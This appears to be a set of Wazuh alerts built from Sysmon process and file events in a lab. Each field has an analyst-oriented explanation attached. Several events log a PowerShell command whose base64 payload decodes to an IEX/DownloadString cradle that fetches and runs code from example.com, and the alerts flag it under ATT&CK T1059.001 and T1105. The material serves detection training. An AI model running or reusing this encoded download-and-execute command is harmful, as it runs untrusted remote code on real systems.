Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00}
ParentProcessId: 11356
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:16.709 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd94-680a-9f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 90 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534361.1820650 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:18.4176699Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285234 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:18.402
ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00}
ProcessId: 9520
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2q2rgyzm.xew.ps1
CreationUtcTime: 2025-04-24 22:39:18.402
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:18.402 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd94-680a-9f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2q2rgyzm.xew.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:18.402 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 87 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534365.1823415 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:22.8896094Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285277 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:19.846
ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00}
ProcessId: 13412
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00}
ParentProcessId: 9520
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:19.846 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd97-680a-a20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 91 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534365.1831482 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:23.1989175Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285278 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:23.146
ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00}
ProcessId: 13412
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1
CreationUtcTime: 2025-04-24 22:39:23.146
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:23.146 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd97-680a-a20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:23.146 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 88 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534369.1834251 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:26.3809613Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285299 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:24.789
ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00}
ProcessId: 12304
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00}
ParentProcessId: 13412
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:24.789 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd9c-680a-a40b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
